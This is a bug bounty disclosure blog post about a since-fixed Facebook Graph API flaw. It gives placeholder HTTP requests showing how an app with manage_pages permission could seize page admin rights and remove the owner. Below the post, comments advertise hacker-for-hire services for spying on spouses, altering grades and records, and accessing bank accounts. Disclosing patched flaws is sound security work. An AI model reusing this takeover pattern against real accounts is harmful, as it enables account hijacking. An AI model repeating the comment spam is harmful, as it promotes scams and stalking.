A security vulnerability in Facebook business manager endpoint allows a third party application to hack Facebook account page with limited permissions and the victim will permanently lose admin access to the page.

By default, Facebook application interface does not allow third-party applications to add or modify page admin roles (page roles like a manager, editor, analyst etc..). Third-party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc.. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as an admin to the page and remove the actual owner permanently.

facebook page hack
In the other hand, there is an endpoint for business pages called userpermissions which allow to add or remove business page admin roles who are already handling the Facebook business.The following request would make target user as admin of the page.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>
 
Response:-
true
After a few minutes of testing, I got to know that removing the business parameter from the request didn’t throw any error and allow us to add anyone as new page admin and delete the actual page admin on the non-business page where the application has manage_pages permission.
That’s it! Whatever the application may be, if it is having the manage_pages permission of the admin then it could hack all of your Facebook account pages in a fraction of seconds.

Also, read common ways on how to hack facebook account in few minutes and their prevention techniques

Final Proof of Concept:- 

If you are unable to understand then please watch this video.

Page Takeover :

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
true
 

Removing Victim

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>
 
Response:-
true
That’s all! Target page is hacked!
 

Reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2500 USD as a part of their bug bounty program.Even though they placed a fix for this vulnerability, please be aware of the permissions you grant to any applications.

Permissions dialog box would look like this
Manage pages permission dialog box
Also, read the ways to hack facebook account found by whitehat hackers on Facebook bug bounty program
If manage_pages is requested please note that this app would be able to manage your pages (post statuses, publish photos etc..).
Don’t worry you can still modify the permissions you have granted to other apps here.
 

Also, read how to make money online tutorial

Facebook reply after few emails 
 
Acknowledgement of Fix

  • Rj Manjit

    wow its fake but i love this post ……..
    you can visit my site …..
    http://www.allindiancreation.com

  • Franco foster

    Don’t be too anxious to contact fake hackers, I’m telling you this due to my past experience from fake hackers until I find this professional and trustworthy hacker [email protected] gmailcom who was able to get my job done for me within some hours. He is really capable of doing any sort of hacking you which to like Facebook, WhatsApp, Snapchat, wechat,Twitter, and mails,
    Be careful guys emrys is the man that befits your work.I believe you will surely thank me later with my personal experience with him….tell him PATTI refers you.
    you can also contact him.. +1(321)730-8834.

  • doris simeon

    Do you require hacker for hire services? do you want hack your friend/partners phone to find out what they are up to? do you want access to mails, whatsapp, viber, do you want hack your school grades, transcripts or enrollment? Delete records. if you do need a hacker, messagespecialhacker4uAT(gmmaiil(dot) com

    • robert pires

      wow specialhacker is so fast….i messaged them just now after seeing your post and they already hacked my wife phone successfull

    • mark david

      they also helped me too

  • philip koke

    do you need to change your grades, access facebook, whatsapp, mails, instagram, snapchat, delete criminal records, remotely access mobile phones, pc, database and websites access, icloud access, western union transfer, bank account, credit card then send a mail request to SABICRACKER AT G MAIL D0T C0M

    • mathew Flash

      thumbs up to this group of hackers…they helped me nail my cheating girl and my delete my poor credit records

  • You can hire the services of a professional hacker who can help you gain unrestricted and unoticable access into your cheating spouse cellphone……You can send me a mail stating what you need. Kindly send me a mail to my above email